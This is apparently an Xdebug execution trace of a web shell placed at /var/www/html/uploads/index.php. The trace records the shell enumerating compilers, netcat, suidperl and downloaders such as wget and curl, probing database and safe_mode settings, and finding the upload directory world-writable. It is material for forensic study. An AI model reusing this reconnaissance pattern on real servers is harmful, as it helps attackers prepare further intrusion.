2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/cc'
3	1449	0	0.059432	588384	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/cc'
3	1449	1	0.059445	588416
3	1449	R			11
2	1444	1	0.059458	588344
2	1444	R			11
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'cc, '
2	1450	0	0.059492	588352	which	1		/var/www/html/uploads/index.php	142	1	'ld'
3	1451	0	0.059505	588392	exe	1		/var/www/html/uploads/index.php	336	1	'which ld'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1452	0	0.059528	588392	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1452	1	0.059541	588432
4	1452	R			TRUE
4	1453	0	0.059554	588416	exec	0		/var/www/html/uploads/index.php	232	2	'which ld'	''
4	1453	1	0.060771	588936
4	1453	R			'/usr/bin/ld'
4	1454	0	0.060795	588832	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/ld']
4	1454	1	0.060813	588896
4	1454	R			'/usr/bin/ld'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/ld'
3	1451	1	0.060840	588432
3	1451	R			'/usr/bin/ld'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/ld'
3	1455	0	0.060866	588392	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/ld'
3	1455	1	0.060879	588424
3	1455	R			11
2	1450	1	0.060892	588352
2	1450	R			11
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'ld, '
2	1456	0	0.060925	588352	which	1		/var/www/html/uploads/index.php	142	1	'make'
3	1457	0	0.060939	588392	exe	1		/var/www/html/uploads/index.php	336	1	'which make'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1458	0	0.060963	588392	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1458	1	0.060976	588432
4	1458	R			TRUE
4	1459	0	0.060989	588416	exec	0		/var/www/html/uploads/index.php	232	2	'which make'	''
4	1459	1	0.062243	588936
4	1459	R			'/usr/bin/make'
4	1460	0	0.062268	588832	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/make']
4	1460	1	0.062285	588896
4	1460	R			'/usr/bin/make'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/make'
3	1457	1	0.062313	588432
3	1457	R			'/usr/bin/make'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/make'
3	1461	0	0.062339	588392	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/make'
3	1461	1	0.062352	588424
3	1461	R			13
2	1456	1	0.062365	588352
2	1456	R			13
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'make, '
2	1462	0	0.062399	588360	which	1		/var/www/html/uploads/index.php	142	1	'php'
3	1463	0	0.062412	588400	exe	1		/var/www/html/uploads/index.php	336	1	'which php'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1464	0	0.062435	588400	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1464	1	0.062448	588440
4	1464	R			TRUE
4	1465	0	0.062461	588424	exec	0		/var/www/html/uploads/index.php	232	2	'which php'	''
4	1465	1	0.063710	588944
4	1465	R			'/usr/bin/php'
4	1466	0	0.063735	588840	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/php']
4	1466	1	0.063752	588904
4	1466	R			'/usr/bin/php'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/php'
3	1463	1	0.063779	588440
3	1463	R			'/usr/bin/php'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/php'
3	1467	0	0.063806	588400	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/php'
3	1467	1	0.063819	588432
3	1467	R			12
2	1462	1	0.063832	588360
2	1462	R			12
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'php, '
2	1468	0	0.063865	588368	which	1		/var/www/html/uploads/index.php	142	1	'perl'
3	1469	0	0.063879	588408	exe	1		/var/www/html/uploads/index.php	336	1	'which perl'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1470	0	0.063902	588408	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1470	1	0.063916	588448
4	1470	R			TRUE
4	1471	0	0.063929	588432	exec	0		/var/www/html/uploads/index.php	232	2	'which perl'	''
4	1471	1	0.065142	588952
4	1471	R			'/usr/bin/perl'
4	1472	0	0.065180	588848	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/perl']
4	1472	1	0.065199	588912
4	1472	R			'/usr/bin/perl'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/perl'
3	1469	1	0.065226	588448
3	1469	R			'/usr/bin/perl'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/perl'
3	1473	0	0.065253	588408	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/perl'
3	1473	1	0.065266	588440
3	1473	R			13
2	1468	1	0.065279	588368
2	1468	R			13
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'perl, '
2	1474	0	0.065313	588368	which	1		/var/www/html/uploads/index.php	142	1	'python'
3	1475	0	0.065327	588408	exe	1		/var/www/html/uploads/index.php	336	1	'which python'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1476	0	0.065350	588408	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1476	1	0.065363	588448
4	1476	R			TRUE
4	1477	0	0.065376	588432	exec	0		/var/www/html/uploads/index.php	232	2	'which python'	''
4	1477	1	0.066538	588552
4	1477	R			''
4	1478	0	0.066560	588488	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1478	1	0.066576	588552
4	1478	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1475	1	0.066602	588408
3	1475	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1474	1	0.066625	588368
2	1474	R			FALSE
2	1479	0	0.066639	588368	which	1		/var/www/html/uploads/index.php	142	1	'ruby'
3	1480	0	0.066653	588408	exe	1		/var/www/html/uploads/index.php	336	1	'which ruby'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1481	0	0.066683	588408	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1481	1	0.066696	588448
4	1481	R			TRUE
4	1482	0	0.066709	588432	exec	0		/var/www/html/uploads/index.php	232	2	'which ruby'	''
4	1482	1	0.067907	588552
4	1482	R			''
4	1483	0	0.067930	588488	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1483	1	0.067946	588552
4	1483	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1480	1	0.067971	588408
3	1480	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1479	1	0.067995	588368
2	1479	R			FALSE
2	1484	0	0.068009	588368	which	1		/var/www/html/uploads/index.php	142	1	'tar'
3	1485	0	0.068023	588408	exe	1		/var/www/html/uploads/index.php	336	1	'which tar'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1486	0	0.068047	588408	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1486	1	0.068060	588448
4	1486	R			TRUE
4	1487	0	0.068074	588432	exec	0		/var/www/html/uploads/index.php	232	2	'which tar'	''
4	1487	1	0.069289	588952
4	1487	R			'/usr/bin/tar'
4	1488	0	0.069314	588848	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/tar']
4	1488	1	0.069331	588912
4	1488	R			'/usr/bin/tar'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/tar'
3	1485	1	0.069357	588448
3	1485	R			'/usr/bin/tar'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/tar'
3	1489	0	0.069384	588408	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/tar'
3	1489	1	0.069397	588440
3	1489	R			12
2	1484	1	0.069410	588368
2	1484	R			12
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'tar, '
2	1490	0	0.069444	588376	which	1		/var/www/html/uploads/index.php	142	1	'gzip'
3	1491	0	0.069457	588416	exe	1		/var/www/html/uploads/index.php	336	1	'which gzip'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1492	0	0.069481	588416	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1492	1	0.069494	588456
4	1492	R			TRUE
4	1493	0	0.069507	588440	exec	0		/var/www/html/uploads/index.php	232	2	'which gzip'	''
4	1493	1	0.070720	588960
4	1493	R			'/usr/bin/gzip'
4	1494	0	0.070744	588856	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/gzip']
4	1494	1	0.070761	588920
4	1494	R			'/usr/bin/gzip'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/gzip'
3	1491	1	0.070788	588456
3	1491	R			'/usr/bin/gzip'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/gzip'
3	1495	0	0.070815	588416	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/gzip'
3	1495	1	0.070828	588448
3	1495	R			13
2	1490	1	0.070842	588376
2	1490	R			13
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'gzip, '
2	1496	0	0.070876	588392	which	1		/var/www/html/uploads/index.php	142	1	'bzip'
3	1497	0	0.070890	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which bzip'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1498	0	0.070914	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1498	1	0.070927	588472
4	1498	R			TRUE
4	1499	0	0.070939	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which bzip'	''
4	1499	1	0.072137	588576
4	1499	R			''
4	1500	0	0.072160	588512	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1500	1	0.072175	588576
4	1500	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1497	1	0.072201	588432
3	1497	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1496	1	0.072224	588392
2	1496	R			FALSE
2	1501	0	0.072239	588392	which	1		/var/www/html/uploads/index.php	142	1	'bzialfa2'
3	1502	0	0.072258	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which bzialfa2'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1503	0	0.072283	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1503	1	0.072296	588472
4	1503	R			TRUE
4	1504	0	0.072309	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which bzialfa2'	''
4	1504	1	0.073499	588576
4	1504	R			''
4	1505	0	0.073522	588512	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1505	1	0.073538	588576
4	1505	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1502	1	0.073563	588432
3	1502	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1501	1	0.073587	588392
2	1501	R			FALSE
2	1506	0	0.073601	588392	which	1		/var/www/html/uploads/index.php	142	1	'nc'
3	1507	0	0.073614	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which nc'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1508	0	0.073638	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1508	1	0.073652	588472
4	1508	R			TRUE
4	1509	0	0.073665	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which nc'	''
4	1509	1	0.074827	588976
4	1509	R			'/usr/bin/nc'
4	1510	0	0.074851	588872	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/nc']
4	1510	1	0.074868	588936
4	1510	R			'/usr/bin/nc'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/nc'
3	1507	1	0.074896	588472
3	1507	R			'/usr/bin/nc'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/nc'
3	1511	0	0.074922	588432	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/nc'
3	1511	1	0.074935	588464
3	1511	R			11
2	1506	1	0.074948	588392
2	1506	R			11
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'nc, '
2	1512	0	0.074982	588392	which	1		/var/www/html/uploads/index.php	142	1	'locate'
3	1513	0	0.074996	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which locate'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1514	0	0.075018	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1514	1	0.075031	588472
4	1514	R			TRUE
4	1515	0	0.075044	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which locate'	''
4	1515	1	0.076212	588576
4	1515	R			''
4	1516	0	0.076234	588512	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1516	1	0.076250	588576
4	1516	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1513	1	0.076275	588432
3	1513	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1512	1	0.076299	588392
2	1512	R			FALSE
2	1517	0	0.076313	588392	which	1		/var/www/html/uploads/index.php	142	1	'suidperl'
3	1518	0	0.076327	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which suidperl'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1519	0	0.076351	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1519	1	0.076364	588472
4	1519	R			TRUE
4	1520	0	0.076378	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which suidperl'	''
4	1520	1	0.077576	588576
4	1520	R			''
4	1521	0	0.077599	588512	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1521	1	0.077615	588576
4	1521	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1518	1	0.077640	588432
3	1518	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1517	1	0.077664	588392
2	1517	R			FALSE
1		A						/var/www/html/uploads/index.php	150	$downloaders = [0 => 'wget', 1 => 'fetch', 2 => 'lynx', 3 => 'links', 4 => 'curl', 5 => 'get', 6 => 'lwp-mirror']
1		A						/var/www/html/uploads/index.php	151	$x = 0
2	1522	0	0.077707	588392	which	1		/var/www/html/uploads/index.php	153	1	'wget'
3	1523	0	0.077720	588432	exe	1		/var/www/html/uploads/index.php	336	1	'which wget'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1524	0	0.077750	588432	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1524	1	0.077764	588472
4	1524	R			TRUE
4	1525	0	0.077777	588456	exec	0		/var/www/html/uploads/index.php	232	2	'which wget'	''
4	1525	1	0.078980	588976
4	1525	R			'/usr/bin/wget'
4	1526	0	0.079005	588872	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/wget']
4	1526	1	0.079022	588936
4	1526	R			'/usr/bin/wget'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/wget'
3	1523	1	0.079050	588472
3	1523	R			'/usr/bin/wget'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/wget'
3	1527	0	0.079076	588432	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/wget'
3	1527	1	0.079089	588464
3	1527	R			13
2	1522	1	0.079103	588392
2	1522	R			13
1		A						/var/www/html/uploads/index.php	154	$x++
1		A						/var/www/html/uploads/index.php	155	$downloader .= 'wget, '
2	1528	0	0.079138	588424	which	1		/var/www/html/uploads/index.php	153	1	'fetch'
3	1529	0	0.079152	588464	exe	1		/var/www/html/uploads/index.php	336	1	'which fetch'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1530	0	0.079176	588464	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1530	1	0.079189	588504
4	1530	R			TRUE
4	1531	0	0.079202	588488	exec	0		/var/www/html/uploads/index.php	232	2	'which fetch'	''
4	1531	1	0.080381	588608
4	1531	R			''
4	1532	0	0.080403	588544	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1532	1	0.080419	588608
4	1532	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1529	1	0.080444	588464
3	1529	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1528	1	0.080468	588424
2	1528	R			FALSE
2	1533	0	0.080482	588424	which	1		/var/www/html/uploads/index.php	153	1	'lynx'
3	1534	0	0.080496	588464	exe	1		/var/www/html/uploads/index.php	336	1	'which lynx'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1535	0	0.080520	588464	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1535	1	0.080534	588504
4	1535	R			TRUE
4	1536	0	0.080547	588488	exec	0		/var/www/html/uploads/index.php	232	2	'which lynx'	''
4	1536	1	0.081810	588608
4	1536	R			''
4	1537	0	0.081833	588544	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1537	1	0.081849	588608
4	1537	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1534	1	0.081875	588464
3	1534	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1533	1	0.081898	588424
2	1533	R			FALSE
2	1538	0	0.081912	588424	which	1		/var/www/html/uploads/index.php	153	1	'links'
3	1539	0	0.081926	588464	exe	1		/var/www/html/uploads/index.php	336	1	'which links'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1540	0	0.081950	588464	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1540	1	0.081963	588504
4	1540	R			TRUE
4	1541	0	0.081977	588488	exec	0		/var/www/html/uploads/index.php	232	2	'which links'	''
4	1541	1	0.083166	588608
4	1541	R			''
4	1542	0	0.083188	588544	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1542	1	0.083203	588608
4	1542	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1539	1	0.083229	588464
3	1539	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1538	1	0.083253	588424
2	1538	R			FALSE
2	1543	0	0.083266	588424	which	1		/var/www/html/uploads/index.php	153	1	'curl'
3	1544	0	0.083280	588464	exe	1		/var/www/html/uploads/index.php	336	1	'which curl'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1545	0	0.083304	588464	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1545	1	0.083317	588504
4	1545	R			TRUE
4	1546	0	0.083331	588488	exec	0		/var/www/html/uploads/index.php	232	2	'which curl'	''
4	1546	1	0.084546	589008
4	1546	R			'/usr/bin/curl'
4	1547	0	0.084575	588904	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/curl']
4	1547	1	0.084593	588968
4	1547	R			'/usr/bin/curl'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/curl'
3	1544	1	0.084620	588504
3	1544	R			'/usr/bin/curl'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/curl'
3	1548	0	0.084646	588464	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/curl'
3	1548	1	0.084659	588496
3	1548	R			13
2	1543	1	0.084672	588424
2	1543	R			13
1		A						/var/www/html/uploads/index.php	154	$x++
1		A						/var/www/html/uploads/index.php	155	$downloader .= 'curl, '
2	1549	0	0.084706	588432	which	1		/var/www/html/uploads/index.php	153	1	'get'
3	1550	0	0.084720	588472	exe	1		/var/www/html/uploads/index.php	336	1	'which get'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1551	0	0.084742	588472	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1551	1	0.084756	588512
4	1551	R			TRUE
4	1552	0	0.084769	588496	exec	0		/var/www/html/uploads/index.php	232	2	'which get'	''
4	1552	1	0.086012	588616
4	1552	R			''
4	1553	0	0.086035	588552	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1553	1	0.086051	588616
4	1553	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1550	1	0.086076	588472
3	1550	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1549	1	0.086100	588432
2	1549	R			FALSE
2	1554	0	0.086114	588432	which	1		/var/www/html/uploads/index.php	153	1	'lwp-mirror'
3	1555	0	0.086128	588480	exe	1		/var/www/html/uploads/index.php	336	1	'which lwp-mirror'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1556	0	0.086152	588480	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1556	1	0.086165	588520
4	1556	R			TRUE
4	1557	0	0.086179	588504	exec	0		/var/www/html/uploads/index.php	232	2	'which lwp-mirror'	''
4	1557	1	0.087395	589040
4	1557	R			'/usr/bin/lwp-mirror'
4	1558	0	0.087419	588928	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/lwp-mirror']
4	1558	1	0.087437	588992
4	1558	R			'/usr/bin/lwp-mirror'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/lwp-mirror'
3	1555	1	0.087464	588528
3	1555	R			'/usr/bin/lwp-mirror'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/lwp-mirror'
3	1559	0	0.087491	588480	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/lwp-mirror'
3	1559	1	0.087505	588512
3	1559	R			19
2	1554	1	0.087518	588432
2	1554	R			19
1		A						/var/www/html/uploads/index.php	154	$x++
1		A						/var/www/html/uploads/index.php	155	$downloader .= 'lwp-mirror, '
2	1560	0	0.087554	588448	scandir	0		/var/www/html/uploads/index.php	392	1	'/var/www/html/uploads'
2	1560	1	0.087588	589072
2	1560	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'index.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/index.php	392	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'index.php', 5 => 'prepend.php']
2	1561	0	0.087629	589040	clear	1		/var/www/html/uploads/index.php	421	0
2	1561	1	0.087643	589040
2	1562	0	0.087659	589152	phpversion	0		/var/www/html/uploads/index.php	506	0
2	1562	1	0.087672	589216
2	1562	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	1563	0	0.087690	589152	formatSize	1		/var/www/html/uploads/index.php	514	1	232015802368
2		A						/var/www/html/uploads/index.php	184	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/index.php	185	$i = 0
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
3	1564	0	0.087782	589152	round	0		/var/www/html/uploads/index.php	186	2	216.08155441284	2
3	1564	1	0.087796	589224
3	1564	R			216.08
2	1563	1	0.087818	589192
2	1563	R			'216.08 GB'
2	1565	0	0.087832	589152	formatSize	1		/var/www/html/uploads/index.php	514	1	195440615424
2		A						/var/www/html/uploads/index.php	184	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/index.php	185	$i = 0
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
2		A						/var/www/html/uploads/index.php	185	$bytes /= 1024
2		A						/var/www/html/uploads/index.php	185	$i++
3	1566	0	0.087916	589152	round	0		/var/www/html/uploads/index.php	186	2	182.01825714111	2
3	1566	1	0.087930	589224
3	1566	R			182.02
2	1565	1	0.087944	589192
2	1565	R			'182.02 GB'
2	1567	0	0.087960	589152	rtrim	0		/var/www/html/uploads/index.php	530	2	'gcc, cc, ld, make, php, perl, tar, gzip, nc, '	', '
2	1567	1	0.087976	589304
2	1567	R			'gcc, cc, ld, make, php, perl, tar, gzip, nc'
2	1568	0	0.087992	589152	rtrim	0		/var/www/html/uploads/index.php	534	2	'wget, curl, lwp-mirror, '	', '
2	1568	1	0.088006	589272
2	1568	R			'wget, curl, lwp-mirror'
2	1569	0	0.088022	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'curl_version'
2	1569	1	0.088035	589192
2	1569	R			TRUE
2	1570	0	0.088049	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'ssh2_connect'
2	1570	1	0.088062	589192
2	1570	R			FALSE
2	1571	0	0.088075	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'get_magic_quotes_gpc'
2	1571	1	0.088088	589192
2	1571	R			TRUE
2	1572	0	0.088102	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'mysql_get_client_info'
2	1572	1	0.088115	589192
2	1572	R			FALSE
2	1573	0	0.088128	589152	class_exists	0		/var/www/html/uploads/index.php	537	1	'mysqli'
2	1573	1	0.088141	589192
2	1573	R			FALSE
2	1574	0	0.088155	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'mssql_connect'
2	1574	1	0.088168	589192
2	1574	R			FALSE
2	1575	0	0.088181	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'pg_connect'
2	1575	1	0.088193	589192
2	1575	R			FALSE
2	1576	0	0.088207	589152	function_exists	0		/var/www/html/uploads/index.php	537	1	'oci_connect'
2	1576	1	0.088219	589192
2	1576	R			FALSE
2	1577	0	0.088232	589152	ini_get	0		/var/www/html/uploads/index.php	540	1	'safe_mode'
2	1577	1	0.088244	589184
2	1577	R			FALSE
2	1578	0	0.088258	589152	ini_get	0		/var/www/html/uploads/index.php	540	1	'safe_mode_exec_dir'
2	1578	1	0.088270	589184
2	1578	R			FALSE
2	1579	0	0.088283	589152	ini_get	0		/var/www/html/uploads/index.php	540	1	'safe_mode_include_dir'
2	1579	1	0.088296	589184
2	1579	R			FALSE
1		A						/var/www/html/uploads/index.php	554	$numDir = 5
1		A						/var/www/html/uploads/index.php	555	$id = 0
1		A						/var/www/html/uploads/index.php	555	$id = 1
1		A						/var/www/html/uploads/index.php	565	$i = 0
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	555	$id = 2
1		A						/var/www/html/uploads/index.php	565	$i = 0
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	555	$id = 3
1		A						/var/www/html/uploads/index.php	565	$i = 0
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	565	$i++
1		A						/var/www/html/uploads/index.php	555	$id = 4
2	1580	0	0.088467	589152	perms	1		/var/www/html/uploads/index.php	575	1	'/var/www/html/uploads'
3	1581	0	0.088480	589152	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads'
3	1581	1	0.088496	589216
3	1581	R			16895
2		A						/var/www/html/uploads/index.php	191	$perms = 16895
2		A						/var/www/html/uploads/index.php	201	$info = 'd'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= 'x'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= 'w'
2		A						/var/www/html/uploads/index.php	218	$info .= 'x'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= 'w'
2		A						/var/www/html/uploads/index.php	223	$info .= 'x'
3	1582	0	0.088618	589216	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	16895
3	1582	1	0.088632	589600
3	1582	R			'40777'
3	1583	0	0.088646	589536	substr	0		/var/www/html/uploads/index.php	224	2	'40777'	-4
3	1583	1	0.088659	589632
3	1583	R			'0777'
2	1580	1	0.088672	589224
2	1580	R			'0777 >> drwxrwxrwx'
2	1584	0	0.088686	589224	checkPerm	1		/var/www/html/uploads/index.php	575	2	'/var/www/html/uploads'	'0777 >> drwxrwxrwx'
3	1585	0	0.088701	589224	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0777 >> drwxrwxrwx'
3	1585	1	0.088715	589744
3	1585	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1586	0	0.088743	589672	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads'
3	1586	1	0.088760	589712
3	1586	R			TRUE
2	1584	1	0.088774	589352
2	1584	R			'<font class=\'text-success\'>0777 </font> >> <font class=\'text-success\'> drwxrwxrwx</font>'
2	1587	0	0.088793	589176	is_readable	0		/var/www/html/uploads/index.php	586	1	'/var/www/html/uploads'
2	1587	1	0.088809	589216
2	1587	R			TRUE
2	1588	0	0.088822	589224	is_dir	0		/var/www/html/uploads/index.php	603	1	'/var/www/html/uploads/.'
2	1588	1	0.088837	589264
2	1588	R			TRUE
2	1589	0	0.088852	589176	filetype	0		/var/www/html/uploads/index.php	615	1	'.'
2	1589	1	0.088866	589256
2	1589	R			'dir'
